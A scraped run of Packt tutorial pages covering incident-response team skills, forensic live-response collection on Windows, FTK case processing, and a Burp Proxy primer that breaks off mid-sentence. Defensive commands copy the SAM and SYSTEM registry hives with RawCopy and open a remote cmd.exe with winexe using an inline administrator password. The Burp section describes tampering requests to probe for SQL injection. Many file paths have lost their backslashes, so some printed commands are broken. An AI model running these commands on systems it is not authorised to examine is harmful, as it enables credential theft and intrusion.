important skill to ensure that the incident response team members say the right words to the right people. Presentation skills Not all technical experts have good presentation skills. They may not be comfortable in front of a large audience. Gaining confidence in presentation skills will take time and effort for the team's members to become more experienced and comfortable in such situations. Diplomacy The members of the incident response team interact with people who may have a variety of goals and needs. Skilled incident response team members will be able to anticipate potential points of contention, be able to respond appropriately, maintain good relationships, and avoid offending others. They also will understand that they are representing the IR team and their organization. Diplomacy and tact are very important. The ability to follow policies and procedures Another important skill that members of the team need is the ability to follow and support the established policies and procedures of the organization or team. Team skills IR staff must be able to work in the team environment as productive and cordial team players. They need to be aware of their responsibilities, contribute to the goals of the team, and work together to share information, workload, and experiences. They must be flexible and willing to adapt to change. They also need skills to interact with other parties. Integrity The nature of IR work means that team members often deal with information that is sensitive and, occasionally, they might have access to information that is newsworthy. The team's members must be trustworthy, discrete, and able to handle information in confidence according to the guidelines, any constituency agreements or regulations, and/or any organizational policies and procedures. In their efforts to provide technical explanations or responses, the IR staff must be careful to provide appropriate and accurate information while avoiding the dissemination of any confidential information that could detrimentally affect another organization's reputation, result in the loss of the IR team's integrity, or affect other activities that involve other parties. Knowing one's limits Another important ability that the IR team's members must have is the ability to be able to readily admit when they have reached the limit of their own knowledge or expertise in a given area. However difficult it is to admit a limitation, individuals must recognize their limitations and actively seek support from their team members, other experts, or their management. Coping with stress The IR team's members often could be in stressful situations. They need to be able to recognize when they are becoming stressed, be willing to make their fellow team members aware of the situation, and take (or seek help with) the necessary steps to control and maintain their composure. In particular, they need the ability to remain calm in tense situations—ranging from an excessive workload to an aggressive caller to an incident where human life or a critical infrastructure may be at risk. The team's reputation, and the individual's personal reputation, will be enhanced or will suffer depending on how such situations are handled. Problem solving IR team members are confronted with data every day, and sometimes, the volume of information is large. Without good problem-solving skills, staff members could become overwhelmed with the volumes of data that are related to incidents and other tasks that need to be handled. Problem-solving skills also include the ability for the IR team's members to "think outside the box" or look at issues from multiple perspectives to identify relevant information or data. Time management Along with problem-solving skills, it is also important for the IR team's members to be able to manage their time effectively. They will be confronted with a multitude of tasks ranging from analyzing, coordinating, and responding to incidents, to performing duties, such as prioritizing their workload, attending and/or preparing for meetings, completing time sheets, collecting statistics, conducting research, giving briefings and presentations, traveling to conferences, and possibly providing on-site technical support. Technical skills Another important component of the skills needed for an IR team to be effective is the technical skills of their staff. These skills, which define the depth and breadth of understanding of the technologies that are used by the team, and the constituency it serves, are outlined in the following sections. In turn, the technical skills, which the IR team members should have, can be divided into two groups: security fundamentals and incident handling skills. Security fundamentals Let's look at some of the security fundamentals in the following subsections. Security principles The IR team's members need to have a general understanding of the basic security principles, such as the following: Confidentiality Availability Authentication Integrity Access control Privacy Nonrepudiation Security vulnerabilities and weaknesses To understand how any specific attack is manifested in a given software or hardware technology, the IR team's members need to be able to first understand the fundamental causes of vulnerabilities through which most attacks are exploited. They need to be able to recognize and categorize the most common types of vulnerabilities and associated attacks, such as those that might involve the following: Physical security issues Protocol design flaws (for example, man-in-the-middle attacks or spoofing) Malicious code (for example, viruses, worms, or Trojan horses) Implementation flaws (for example, buffer overflow or timing windows/race conditions) Configuration weaknesses User errors or indifference The Internet It is important that the IR team's members also understand the Internet. Without this fundamental background information, they will struggle or fail to understand other technical issues, such as the lack of security in underlying protocols and services that are used on the Internet or to anticipate the threats that might occur in the future. Risks The IR team's members need to have a basic understanding of computer security risk analysis. They should understand the effects on their constituency of various types of risks (such as potentially widespread Internet attacks, national security issues as they relate to their team and constituency, physical threats, financial threats, loss of business, reputation, or customer confidence, and damage or loss of data). Network protocols Members of the IR team need to have a basic understanding of the common (or core) network protocols that are used by the team and the constituency that they serve. For each protocol, they should have a basic understanding of the protocol, its specifications, and how it is used. In addition to this, they should understand the common types of threats or attacks against the protocol, as well as strategies to mitigate or eliminate such attacks. For example, at a minimum, the staff should be familiar with protocols, such as IP, TCP, UDP, ICMP, ARP, and RARP. They should understand how these protocols work, what they are used for, the differences between them, some of the common weaknesses, and so on. In addition to this, the staff should have a similar understanding of protocols, such as TFTP, FTP, HTTP, HTTPS, SNMP, SMTP, and any other protocols. The specialist skills include a more in-depth understanding of security concepts and principles in all the preceding areas in addition to expert knowledge in the mechanisms and technologies that lead to flaws in these protocols, the weaknesses that can be exploited (and why), the types of exploitation methods that would likely be used, and the strategies to mitigate or eliminate these potential problems. They should have expert understanding of additional protocols or Internet technologies (DNSSEC, IPv6, IPSEC, and other telecommunication standards that might be implemented or interface with their constituent's networks, such as ATM, BGP, broadband, voice over IP, wireless technology, other routing protocols, or new emerging technologies, and so on). They could then provide expert technical guidance to other members of the team or constituency. Network applications and services The IR team's staff need a basic understanding of the common network applications and services that the team and the constituency use (DNS, NFS, SSH, and so on). For each application or service they should understand the purpose of the application or service, how it works, its common usages, secure configurations, and the common types of threats or attacks against the application or service, as well as mitigation strategies. Network security issues The members of the IR team should have a basic understanding of the concepts of network security and be able to recognize vulnerable points in network configurations. They should understand the concepts and basic perimeter security of network firewalls (design, packet filtering, proxy systems, DMZ, bastion hosts, and so on), router security, the potential for information disclosure of data traveling across the network (for example, packet monitoring or "sniffers"), or threats that are related to accepting untrustworthy information. Host or system security issues In addition to understanding security issues at a network level, the IR team's members need to understand security issues at a host level for the various types of operating systems (UNIX, Windows, or any other operating systems that are used by the team or constituency). Before understanding the security aspects, the IR team's member must first have the following: Experience using the operating system (user security issues) Some familiarity with managing and maintaining the operating system (as an administrator) Then, for each operating system, the IR team member needs to know how to perform the following: Configure (harden) the system securely Review configuration files for security weaknesses Identify common attack methods Determine whether a compromise attempt occurred Determine whether an attempted system compromise was successful Review log files for anomalies Analyze the results of attacks Manage system privileges Secure network daemons Recover from a compromise Malicious code The IR team's members must understand the different types of malicious code attacks that occur and how these can affect their constituency (system compromises, denial of service, loss of data integrity, and so on). Malicious code can have different types of payloads that can cause a denial of service attack or web defacement, or the code can contain more "dynamic" payloads that can be configured to result in multifaceted attack vectors. Staff should understand not only how malicious code is propagated through some of the obvious methods (disks, e-mail, programs, and so on), but they should also understand how it can propagate through other means, such as PostScript, Word macros, MIME, peer-to-peer file sharing, or boot-sector viruses that affect operating systems running on PC and Macintosh platforms. The IR team's staff must be aware of how such attacks occur and are propagated, the risks and damage associated with such attacks, prevention and mitigation strategies, detection and removal processes, and recovery techniques. Specialist skills include expertise in performing analysis, black box testing, reverse engineering malicious code that is associated with such attacks, and in providing advice to the team on the best approaches for an effective response. Programming skills Some team members need to have system and network programming experience. The team should ensure that a range of programming languages is covered on the operating systems that the team and the constituency use. For example, the team should have experience in the following: C Python Awk Java Shell (all variations) Other scripting tools These scripts or programming tools can be used to assist in the analysis and handling of incident information (for example, writing different scripts to count and sort through various logs, search databases, look up information, extract information from logs or files, and collect and merge data). Incident handling skills Local team policies and protocols Understanding and identifying intruder techniques Communication with sites Incident analysis Maintenance of incident records The hardware for IR and Jump Bag Certainly, a set of equipment that may be required during the processing of the incident should be prepared in advance, and this matter should be given much attention. This set is called the Jump Bag. The formation of such a kit is largely due to the budget the organization could afford. Nevertheless, there is a certain necessary minimum, which will allow the team to handle incidents in small quantities. If the budget allows it, it is possible to buy a turnkey solution, which includes all the necessary equipment and the case for its transportation. As an instance of such a solution, FREDL + Ultra Kit could be recommended. FREDL is short for Forensic Recovery of Evidence Device Laptop. With Ultra Kit, this solution will cost about 5000 USD. Ultra Kit contains a set of write-blockers and a set of adapters and connecters to obtain images of hard drives with a different interface: More details can be found on the manufacturer's website at https://www.digitalintelligence.com/products/ultrakit/. Certainly, if we ignore the main drawback of such a solution, this decision has a lot of advantages as compared to the cost. Besides this, you get a complete starter kit to handle the incident. Besides, Ultra Kit allows you to safely transport equipment without fear of damage. The FRED-L laptop is based on a modern hardware, and the specifications are constantly updated to meet modern requirements. Current specifications can be found on the manufacturer's website at http://www.digitalintelligence.com/products/fredl/. However, if you want to replace the expensive solution, you could build a cheaper alternative that will save 20-30% of the budget. It is possible to buy the components included in the review of decisions separately. As a workstation, you can choose a laptop with the following specifications: Intel Core i7-6700K Skylake Quad Core Processor, 4.0 GHz, 8MB Intel Smart Cache 16 GB PC4-17000 DDR4 2133 Memory 256 GB Solid State Internal SATA Drive Intel Z170 Express Chipset NVIDIA GeForce GTX 970M with 6 GB GDDR5 VRAM This specification will provide a comfortable workstation to work on the road. As a case study for the transport of the equipment, we recommend paying attention to Pelican (http://www.pelican.com) cases. In this case, the manufacturer can choose the equipment to meet your needs. One of the typical tasks in handling of incidents is obtaining images from hard drives. For this task, you can use a duplicator or a bunch of write-blockers and computer. Duplicators are certainly a more convenient solution; their usage allows you to quickly get the disk image without using additional software. Their main drawback is the price. However, if you often have to extract the image of hard drives and you have a few thousand dollars, the purchase of the duplicator is a good investment. If the imaging of hard drives is a relatively rare problem and you have a limited budget, you can purchase a write blocker which will cost 300-500 USD. However, it is necessary to use a computer and software. To pick up the necessary equipment, you can visit http://www.insectraforensics.com, where you can find equipment from different manufacturers. Also, do not forget about the hard drives themselves. It is worth buying a few hard drives with large volumes for the possibility of good performance. To summarize, responders need to include the following items in a basic set: Several network cables (straight through or loopback) A serial cable with a serial USB adapter Network serial adapters Hard drives (various sizes) Flash drives A Linux Live DVD A portable drive duplicator with a write-blocker Various drive interface adapters A four port hub A digital camera Cable ties Cable snips Assorted screws and hex drivers Notebooks and pens Chain of Custody forms Incident handling procedure Software After talking about the hardware, we did not forget about the software that you should always have on hand. The variety of software that can be used in the processing of the incident allows you to select software-based preferences, skills, and budget. Some prefer command-line utilities, and some find that GUI is more convenient to use. Sometimes, the use of certain tools is dictated by the circumstances under which it's needed to work. We strongly recommend that you prepare these in advance and thoroughly test the entire set of required software. Live versus mortem The initial reaction to an incident is a very important step in the process of computer incident management. The correct method of carrying out and performing this step depends on the success of the investigation. Moreover, a correct and timely response is needed to reduce the damage caused by the incident. The traditional approach to the analysis of the disks is not always practical, and in some cases, it is simply not possible. In today's world, the development of computer technology has led to many companies having a distribution network in many cities, countries, and continents. Wish this physical disconnection of the computer from the network, following the traditional investigation of each computer is not possible. In such cases, the incident responder should be able to carry out a prior assessment remotely and as soon as possible, view a list of running processes, open network connections, open files, and get a list of registered users in the system. Then, if necessary, carry out a full investigation. In this article, we will look at some approaches that the responder may apply in a given situation. However, even in these cases when we have physical access to the machine, live response is the only way of incident response. For example, cases where we are dealing with large disk arrays. In this case, there are several problems at once. The first problem is that the space to store large amounts of data is also difficult to identify. In addition to this, the time that may be required to analyze large amounts of data is unreasonably high. Typically, such large volumes of data have a highly loaded server serving hundreds of thousands of users, so their trip, or even a reboot, is not acceptable for business. Another scenario that requires the Live Forensics approach is when an encrypted filesystem is used. In cases where the analyst doesn't have the key to decrypt the disc, Live Forensics is a good alternative to obtain data from a system where encryption of the filesystem is used. This is not an exhaustive list of cases when the Live Analysis could be applicable. It is worth noting one very important point. During the Live Analysis, it is not possible to avoid changes in the system. Connecting external USB devices or network connectivity, user log on, or launching an executable file will be modified in the system in a variety of log files, registry keys, and so on. Therefore, you need to understand what changes were caused by the actions of responders and document them. Volatile data Under the principle of "order of Volatility", you must first collect information that is classified as Volatile Data (the list of network connections, the list of running processes, log on sessions, and so on), which will be irretrievably lost in case the computer is powered off. Then, you can start to collect nonvolatile data, which can also be obtained with the traditional approach in the analysis of the disk image. The main difference in this case is that a Live Forensics set of data is easier to obtain with a working machine. This article will focus on the collection of Volatile data. Typically, this category includes the following data: System uptime and the current time Network parameters (NetBIOS name cache, active connections, the routing table, and so on). NIC configuration settings Logged on users and active sessions Loaded drivers Running services Running processes and their related parameters (loaded DLLs, open handles, and ownership) Autostart modules Shared drives and files opened remotely Recording the time and date of the data collection allows you to define a time interval in which the investigator will perform an analysis of the system: (date / t) & (time / t)>%COMPUTER_NAME% systime.txt systeminfo | find "Boot Time" >>% COMPUTERNAME% systime.txt The last command allows you to< show how long the machine worked since the last reboot. Using the %COMPUTERNAME% environment variable, we can set up separate directories for each machine in case we need to repeat the process of collecting information on different computers in a network. In some cases, signs of compromise are clearly visible in the analysis of network activity. The next set of commands allows you to get this information: nbtstat -c> %COMPUTERNAME%NetNameCache.txt netstat -a -n -o>%COMPUTERNAME%NetStat.txt netstat -rn>%COMPUTNAME%NetRoute.txt ipconfig / all>%COMPUTERNAME%NIC.txt promqry>%COMPUTERNAME%NSniff.txt The first command uses nbtstat.exe to obtain information from the cache of NetBIOS. You display the NetBIOS names in their corresponding IP address. The second and third commands use netstat.exe to record all of the active compounds, listening ports, and routing tables. For information about network settings, the ipconfig.exe network interfaces command is used. The last block command starts the Microsoft promqry utility, which allows you to define the network interfaces on the local machine, which operates in promiscuous mode. This mode is required for network sniffers, so the detection of the regime indicates that the computer can run software that listens to network traffic. To enumerate all the logged on users on the computer, you can use the Sysinternals tools: psloggedon -x>%COMPUTERNAME% LoggedUsers.tx: logonsessions -p >> %COMPUTERNAME%LoggedOnUsers.txt The PsLoggedOn.exe command lists both types of users, those who are logged on to the computer locally, and those who logged on remotely over the network. Using the -x switch, you can get the time at which each user logged on. With the -p key, logonsessions will display all of the processes that were started by the user during the session. It should be noted that logonsessions must be run with administrator privileges. To get a list of all drivers that are loaded into the system, you can use the WDK drivers.exe utility: drivers.exe>%COMPUTERNAME%drivers.txt The next set of commands to obtain a list of running processes and related information is as follows: tasklist / svc>%COMPUTERNAME% taskdserv.txt psservice>%COMPUTERNAME% trasklst.txt tasklist / v>%COMPUTERNAME% taskuserinfo.txt pslist / t>%COMPUTERNAME%tasktree.txt listdlls>%COMPUTERNAME%lstdlls.txt handle -a>%COMPUTERNAME%lsthandles.txt The tasklist.exe utility that is made with the / svc key enumerates the list of running processes and services in their context. While the previous command displays a list of running services, PsService receives information on services using the information in the registry and SCM database. Services are a traditional way through which attackers can access a previously compromised system. Services can be configured to run automatically without user intervention, and they can be launched as part of another process, such as svchost.exe. In addition to this, remote access can be provided through completely legitimate services, such as telnet or ftp. To associate users with their running processes, use the tasklist / v command key. To enumerate a list of DLLs loaded in each process and the full path to the DLL, you can use listsdlls.exe from SysInternals. Another handle.exe utility can be used to list all the handles, which are open processes. This handles registry keys, files, ports, mutexes, and so on. Other utilities require run with administrator privileges. These tools can help identify malicious DLLs that were injected into the processes, as well as files, which have not been accessed by these processes. The next group of commands allows you to get a list of programs that are configured to start automatically: autorunsc.exe -a>%COMPUTERNAME% autoruns.txt at>%COMPUTERNAME% at.txt schtasks / query>%COMPUTERNAME% schtask.txt The first command starts the SysInternals utility, autoruns, and displays a list of executables that run at system startup and when users log on. This utility allows you to detect malware that uses the popular and well-known methods for persistent installation into the system. Two other commands (at and schtasks) display a list of commands that run in the schedule. To start the at command also requires administrator privileges. To install backdoors mechanisms, services are often used, but services are constantly working in the system and, thus, can be easily detected during live response. Thus, create a backdoor that runs on a schedule to avoid detection. For example, an attacker could create a task that will run the malware just outside working hours. To get a list of network share drives and disk files that are deleted, you can use the following two commands: psfile>%COMPUTERNAME%openfileremote.txt net share>%COMPUTERNAME%drives.txt Nonvolatile data After Volatile data has been collected, you can continue to collect Nonvolatile Data. This data can be obtained at the stage of analyzing the disk, but as we mentioned earlier, analysis of the disk is not possible in some cases. This data includes the following: The list of installed software and updates User info Metadata about a filesystem's timestamps Registry data However, upon receipt of this data with the live running of the system, there are difficulties that are associated with the fact that many of these files cannot be copied in the usual way, as they are locked by the operating system. To do this, use one of the utilities. One such utility is the RawCopy.exe utility, which is authored by Joakim Schicht. This is a console application that copies files off NTFS volumes using the low-level disk reading method. The application has two mandatory parameters, target file and output path: -param1: This is the full path to the target file to extract; it also supports IndexNumber instead of file path -param2: This is a valid path to output directory This tool will let you copy files that are usually not accessible because the system has locked them. For instance, the registry hives such as SYSTEM and SAM, files inside SYSTEM VOLUME INFORMATION, or any file on the volume. This supports the input file specified either with the full file path or by its $MFT record number (index number). Here's an example of copying the SYSTEM hive off a running system: RawCopy.exe C:WINDOWSsystem32configSYSTEM %COMPUTERNAME%SYSTEM Here's an example of extracting the $MFT by specifying its index number: RawCopy.exe C:0 %COMPUTERNAME%mft Here's an example of extracting the MFT reference number 30224 and all attributes, including $DATA, and dumping it into C:tmp: RawCopy.exe C:30224 C:tmp -AllAttr To download RawCopy, go to https://github.com/jschicht/RawCopy. Knowing what software is installed and what its updates are helps further the investigation because this shows possible ways to compromise a system through a vulnerability in the software. One of the first actions that the attacker makes is to attack during a system scan to detect active services and exploit the vulnerabilities in them. Thus, services that were not patched can be utilized for remote system penetration. One way to install a set of software and updates is to use the systeminfo utility: systeminfo > %COMPUTERNAME%sysinfo.txt. Moreover, skilled attackers can themselves perform the same actions and install necessary updates in order to hide the traces of penetration into the system. After identifying the vulnerable services and their successful exploits, the attacker creates an account for themselves in order to subsequently use legal ways to enter the system. Therefore, the analysis of data about users of the system reveals the following traces of the compromise: The Recent folder contents, including LNK files and jump lists LNK files in the Office Recent folder The Network Recent folder contents The entire temp folder The entire Temporary Internet Files folder The PrivacyIE folder The Cookies folder The Java Cache folder contents Now, let's consider the preceding cases as follows: Collecting the Recent folder is done as follows: robocopy.exe %RECENT% %COMPUTERNAME%Recent /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%Recent log.txt Here %RECENT% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %RECENT% = %systemdrive%Documents and Settings%USERNAME%Recent For Windows 6.x (Windows Vista and newer): %RECENT% =%systemdrive%Users%USERNAME%AppDataRoaming MicrosoftWindowsRecent Collecting the Office Recent folder is done as follows: robocopy.exe %RECENT_OFFICE% %COMPUTERNAME%Recent_Office /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%Recent_Officelog.txt Here %RECENT_OFFICE% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %RECENT_OFFICE% = %systemdrive%Documents and Settings%USERNAME%Application DataMicrosoftOffice Recent For Windows 6.x (Windows Vista and newer), this is as follows: %RECENT% =%systemdrive%Users%USERNAME%AppDataRoaming MicrosoftWindowsOfficeRecent Collecting the Network Shares Recent folder is done as follows: robocopy.exe %NetShares% %COMPUTERNAME%NetShares /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%NetShareslog.txt Here %NetShares% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %NetShares% = %systemdrive%Documents andSettings%USERNAME%Nethood For Windows 6.x (Windows Vista and newer), this is as follows: %NetShares % =''%systemdrive%Users%USERNAME%AppData RoamingMicrosoftWindowsNetwork Shortcuts'' Collecting the Temporary folder is done as follows: robocopy.exe %TEMP% %COMPUTERNAME%TEMP /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%TEMPlog.txt Here %TEMP% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %TEMP% = %systemdrive%Documents and Settings%USERNAME% Local SettingsTemp For Windows 6.x (Windows Vista and newer), this is as follows: %TEMP% =''%systemdrive%Users%USERNAME%AppData LocalTemp '' Collecting the Temporary Internet Files folder is done as follows: robocopy.exe %TEMP_INTERNET_FILES% %COMPUTERNAME%TEMP_INTERNET_FILES /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%TEMPlog.txt Here %TEMP_INTERNET_FILE% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %TEMP_INTERNET_FILE% = ''%systemdrive%Documents and Settings%USERNAME%Local SettingsTemporary Internet Files'' For Windows 6.x (Windows Vista and newer), this is as follows: %TEMP_INTERNET_FILE% =''%systemdrive%Users%USERNAME% AppDataLocalMicrosoftWindowsTemporary Internet Files" Collecting the PrivacIE folder is done as follows: robocopy.exe %PRIVACYIE % %COMPUTERNAME%PrivacyIE /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%/PrivacyIE/log.txt Here %PRIVACYIE% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %PRIVACYIE% = ''%systemdrive%Documents andSettings%USERNAME% PrivacIE'' For Windows 6.x (Windows Vista and newer), this is as follows: %PRIVACYIE% =''%systemdrive%Users%USERNAME% AppDataRoamingMicrosoftWindowsPrivacIE " Collecting the Cookies folder is done as follows: robocopy.exe %COOKIES% %COMPUTERNAME%Cookies /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%Cookies .txt Here %COOKIES% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %COOKIES% = ''%systemdrive%Documents and Settings%USERNAME%Cookies'' For Windows 6.x (Windows Vista and newer), this is as follows: %COOKIES% =''%systemdrive%Users%USERNAME% AppDataRoamingMicrosoftWindowsCookies" Collecting the Java Cache folder is done as follows: robocopy.exe %JAVACACHE% %COMPUTERNAME%JAVACACHE /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%JAVACAHElog.txt Here %JAVACACHE% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %JAVACACHE% = ''%systemdrive%Documents and Settings%USERNAME%Application DataSunJavaDeployment cache'' For Windows 6.x (Windows Vista and newer), this is as follows: %JAVACACHE% =''%systemdrive%Users%USERNAME%AppData LocalLowSunJavaDeploymentcache" Remote live response However, as mentioned earlier, it is often necessary to carry out the collection of information remotely. On Windows systems, this is often done using the SysInternals PsExec utility. PsExec lets you execute commands on remote computers and does not require the installation of the system. How the program works is a psexec.exe resource executable is another PsExecs executable. This file runs the Windows service on a particular target machine. Before executing the command, PsExec unpacks this hidden resource in the administrative sphere of the remote computer at Admin$ (C:Windows) file Admin$system32psexecsvc.exe. After copying this, PsExec installs and runs the service using the API functions of the Windows management services. Then, after starting psexesvc, a data connection (input commands and getting results) between psexesvc and psexec is established. Upon completion of the work, psexec stops the service and removes it from the target computer. If the remote collection of information is necessary, a working machine running UNIX OS can use the Winexe utility. Winexe is a GNU/Linux-based application that allows users to execute commands remotely on WindowsNT/2000/XP/2003/Vista/7/8 systems. It installs a service on the remote system, executes the command, and uninstalls the service. Winexe allows execution of most of the Windows shell commands: winexe -U [Domain/]User%Password //host command To launch a Windows shell from inside your Linux system, use the following command: winexe -U HOME/Administrator%Pass123 //192.168.0.1 "cmd.exe" Summary In this article, we discussed what we should have in the Jump Bag to handle a computer incident, and what kind of skills the members of the IR team require. Also, we took a look at live response and collected Volatile and Nonvolatile information from a live system. We also discussed different tools to collect information. We also discussed when we should to use a live response approach as an alternative to traditional forensics. Resources for Article: Further resources on this subject: BackTrack Forensics [article] Mobile Phone Forensics – A First Step into Android Forensics [article] Forensics Recovery [article]
Read more
  • 0
  • 0
  • 4171
article-image-processing-case
Packt
18 Mar 2014
4 min read
Save for later

Processing the Case

Packt
18 Mar 2014
4 min read
(For more resources related to this topic, see here.) Changing the time zone The correct use of the Time Zone feature is of the utmost importance for computer forensics because it might reflect the wrong MAC time of files contained in the evidence, making a professional use the wrong information in an investigation report. Based on this, you must configure the time zone to reflect the location where the evidence was acquired. For example, if you conducted the acquisition of a computer that was located in Los Angeles, US, and bring the evidence to Sao Paulo, Brazil, where your lab is situated, you should adjust the time zone to Los Angeles so that the MAC time of files can reflect the actual moment of its modification, alteration, or creation. The FTK allows you to make that time zone change at the same time that you add a new evidence to the case. Select the time zone of the evidence where it was seized from the drop-down list in the Time Zone field. This is required to add evidence in the case. Take a look at the following screenshot: You can also change the value of Time Zone after adding the evidence. In the menu toolbar, click on View and then click on Time Zone Display. Mounting compound files To locate important information during your investigation, you should expand individual compound file types. This lets you see the child files that are contained within a container, such as ZIP or RAR files. You can access this feature from the case manager's new case wizard, or from the Add Evidence or Additional Analysis dialogs. The following are some of the compound files that you can mount: E-mail files: PST, NSF, DBX, and MSG Compressed files: ZIP, RAR, GZIP, TAR, BZIP, and 7-ZIP System files: Windows thumbnails, registry, PKCS7, MS Office, and EVT If you don't mount compound files, the child files will not be located in keyword searches or filters. To expand compound files, perform the following steps: Do one of the following: For new cases, click on the Custom button in the New Case Options dialog For existing cases, go to Evidence | Additional Analysis Select Expand Compound Files. Click on Expansion Options…. In the Compound File Expansions Options dialog, select the types of files that you want to mount. Click on OK: File and folder export You may need to export part of the files or folders to help you perform some action outside of the FTK platform, or simply for the evidence presentation. To export files or folders you need to perform the following steps: Select one or more files that you would like to export. Right-click on the selection and select Export. A new dialog will open. You can configure some settings before exporting as follows: File Options: This field has advanced options to export files and folders. You can use the default options for a simple export. Items to Include: This field has the selection of files and folders that you will export. The options can be checked, listed, highlighted, or selected all together. Destination base path: This field has the folder to save the files. Take a look at the following screenshot: Column settings Columns are responsible for presenting the information property or metadata related to evidence data. By default, the FTK presents the most commonly used columns. However, you can add or remove columns to aid you in quickly finding relevant information. To manage columns in FTK, in the File List view, right-click on column bars and select Column Settings…. The number of columns available is huge. You can add or remove the columns that you need by just selecting the type and clicking on the Add button: The FTK has some templates of columns settings. You can access them by clicking on Manage and navigating to Columns | Manage Columns: You can use some ready-made templates, edit them, or create your own.
Read more
  • 0
  • 0
  • 4160

Packt
03 Sep 2013
11 min read
Save for later

Quick start – Using Burp Proxy

Packt
03 Sep 2013
11 min read
(For more resources related to this topic, see here.) At the top of Burp Proxy, you will notice the following three tabs: intercept: HTTP requests and responses that are in transit can be inspected and modified from this window options: Proxy configurations and advanced preferences can be tuned from this window history: All intercepted traffic can be quickly analyzed from this window If you are not familiar with the HTTP protocol or you want to refresh your knowledge, HTTP Made Really Easy, A Practical Guide to Writing Clients and Servers, found at http://www.jmarshall.com/easy/http/, represents a compact reference. Step 1 – Intercepting web requests After firing up Burp and configuring the browser, let's intercept our first HTTP request. During this exercise, we will intercept a simple request to the publisher's website: In the intercept tab, make sure that Burp Proxy is properly stopping all requests in transit by checking the intercept button. This should be marked as intercept is on. In the browser, type http://www.packtpub.com/ in the URL bar and press Enter. Back in Burp Proxy, you should be able to see the HTTP request made by the browser. At this stage, the request is temporarily stopped in Burp Proxy waiting for the user to either forward or stop it. For instance, press forward and return to the browser. You should see the home page of Packt Publishing as you would normally interact with the website. Again, type http://www.packtpub.com/ in the URL bar and press Enter. Let's press drop this time. Back in the browser, the page will contain the warning Burp proxy error: message was dropped by user. We have dropped the request, thus Burp Proxy did not forward the request to the server. As a result, the browser received a temporary HTML page with the warning message generated by Burp, instead of the original HTML content. Let's try one more time. Type http://www.packtpub.com/ in the URL bar of the browser and press Enter. Once the request is properly captured by Burp Proxy, the action button becomes active. Click on it to display the contextual menu. This is an important functionality as it allows you to import the current web request in any of the other Burp tools. You can already imagine the potentialities of having a set of integrated tools that allow you to manipulate and analyze web requests so easily. For example, if we want to decode the request, we can simply click on send to decoder. Burp Proxy In Burp Proxy, we can also decide to automatically forward all requests without waiting for the user to either forward or drop the communication. By clicking on the intercept button, it is possible to switch from intercept is on to intercept is off. Nevertheless, the proxy will record all requests in transit. Also, Burp Proxy allows you to automatically intercept all responses matching specific characteristics. Take a look at the numerous options available in the intercept server response section from within the Burp Proxy options tab. For example, it is possible to intercept the server's response only if the client's request was intercepted. This is extremely helpful while testing input validation vulnerabilities as we are generally interested in evaluating the server's responses for all tampered requests. Or else, you may only want to intercept and inspect responses having a specific return code (for example, 200 OK). Step 2 – Inspecting web requests Once a request is properly intercepted, it is possible to inspect the entire content, headers, and parameters, using one of the four Burp Proxy message analysis tabs: raw: This view allows you to display the web request in raw format within a simple text editor. This is a very handy visualization as it enables maximum flexibility for further changing the content. params: In this view, the focus is on user-supplied parameters (GET/POST parameters, cookies). This is particularly important in case of complex requests as it allows to consider all entry points for potential vulnerabilities. Whenever applicable, Burp Proxy will also automatically perform URL decoding. In addition, Burp Proxy will attempt to parse commonly used formats, including JSON. headers: Similarly, this view displays the HTTP header names and values in tabular form. hex: In case of binary content, it is useful to inspect the hexadecimal representation of the resource. This view allows to display a request as in a traditional hex editor. The history tab enables you to analyze all web requests transited through the proxy: Click on the history tab. At the top, Burp Proxy shows all the requests in the bundle. At the bottom, it displays the content of the request and response corresponding to the specific selection. If you have previously modified the request, Burp Proxy history will also display the modified version. Displaying HTTP requests and responses intercepted by Burp Proxy By double-clicking on one of the requests, Burp will automatically open a new window with the specific content. From this window, it is possible to browse all the captured communication using the previous and next buttons Back in the history tab, Burp Proxy displays several details for each item including the request method, URL, response's code, and length. Each request is uniquely identified by a number, visible in the left-hand side column. Click on the request identifier. Burp Proxy allows you to set a color for that specific item. This is extremely helpful to highlight important requests or responses. For example, during the initial application enumeration, you may notice an interesting request; you can mark it and get back later for further testing. Burp Proxy history is also useful when you have to evaluate a sequence of requests in order to reproduce a specific application behavior. Click on the display filter, at the top of the history list to hide irrelevant content. If you want to analyze all HTTP requests containing at least one parameter, select the show only parameterised checkbox. If you want to display requests having a specific response, just select the appropriate response code in the filter by status code selection. At this point, you may have already understood the potentialities of the tool to filter and reveal interesting traffic. In addition, when using Burp Suite Professional, you can also use the filter by search term option. This feature is particularly important when you need to analyze hundreds of requests or responses as you can filter relevant traffic only by using regular expressions or simply matching particular strings. Using this feature, you may also be able to discover sensitive information (for example, credentials) embedded in the intercepted pages. Step 3 – Tampering web requests As part of a typical security assessment, you will need to modify HTTP requests and analyze the web application responses. For example, to identify SQL injection vulnerabilities, it is important to inject common attack vectors (for example, a single quote) in all user-supplied input, including HTTP headers, cookies, and GET/POST parameters. If you want to refresh your knowledge on common web application vulnerabilities, the OWASP Top Ten Project article at https://www. owasp.org/index.php/Category:OWASP_Top_Ten_Project is a good starting point. Tampering web requests with Burp is as easy as editing strings in a text editor: Intercept a request containing at least one HTTP parameter. For example, you can point your browser to http://www.packtpub.com/books/all?keys=ASP. Go to Burp Proxy | Intercept. At this point, you should see the corresponding HTTP request. From the raw view, you can simply edit any aspect of the web request in transit. For example, you can change the value of the the GET parameter's keys value from ASP to PHP. Edit the request to 